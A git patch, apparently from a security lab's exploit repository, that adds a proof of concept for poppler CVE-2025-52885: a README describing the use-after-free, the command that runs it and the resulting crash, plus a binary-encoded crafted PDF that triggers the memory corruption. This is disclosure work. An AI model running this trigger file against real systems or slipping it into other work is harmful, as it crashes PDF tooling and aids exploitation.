From 13560528e5f4ac6617c771fb9d60837645144ce0 Mon Sep 17 00:00:00 2001
From: Kevin Backhouse <kevinbackhouse@github.com>
Date: Tue, 14 Oct 2025 13:00:28 +0100
Subject: [PATCH] Proof of concept for poppler CVE-2025-52885

---
 .../poppler-CVE-2025-52885/README.md          |  28 ++++++++++++++++++
 .../poppler-CVE-2025-52885/bug.pdf            | Bin 0 -> 8987 bytes
 2 files changed, 28 insertions(+)
 create mode 100644 SecurityExploits/freedesktop/poppler-CVE-2025-52885/README.md
 create mode 100644 SecurityExploits/freedesktop/poppler-CVE-2025-52885/bug.pdf

diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52885/README.md b/SecurityExploits/freedesktop/poppler-CVE-2025-52885/README.md
new file mode 100644
index 0000000..859f7b6
--- /dev/null
+++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52885/README.md
@@ -0,0 +1,28 @@
+# Proof of concept for poppler CVE-2025-52885
+
+CVE-2025-52885 is a use-after-free vulnerability in
+[poppler](https://gitlab.freedesktop.org/poppler). The bug is in
+[StructTreeRoot.cc](https://gitlab.freedesktop.org/poppler/poppler/-/blob/2a3135888b6079f0a9fd6410ff65351482087b50/poppler/StructTreeRoot.cc). As
+far as we know, this code is only used when one of poppler's command
+line tools is run with a non-default command line option, so the
+vulnerability does not affect the most common uses of poppler.
+
+This directory contains a poc which triggers the bug. To run it:
+
+```bash
+pdfinfo -struct bug.pdf
+```
+
+In our testing, this causes `pdfinfo` to crash with the following error message:
+
+```
+free(): invalid next size (fast)
+Aborted
+```
+
+## Links:
+
+* https://gitlab.freedesktop.org/poppler/poppler/-/issues/1580
+* https://gitlab.freedesktop.org/poppler/poppler/-/merge_requests/1884
+* https://securitylab.github.com/advisories/GHSL-2025-042_poppler/
+* https://www.openwall.com/lists/oss-security/2025/10/13/2
diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52885/bug.pdf b/SecurityExploits/freedesktop/poppler-CVE-2025-52885/bug.pdf
new file mode 100644
index 0000000000000000000000000000000000000000..57b7c92aa4442c21aa570ab0de190ba2f4aa0827
GIT binary patch
literal 8987
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
T{KdP_^q7NxGa<h2u)}`=@gMzM

literal 0
HcmV?d00001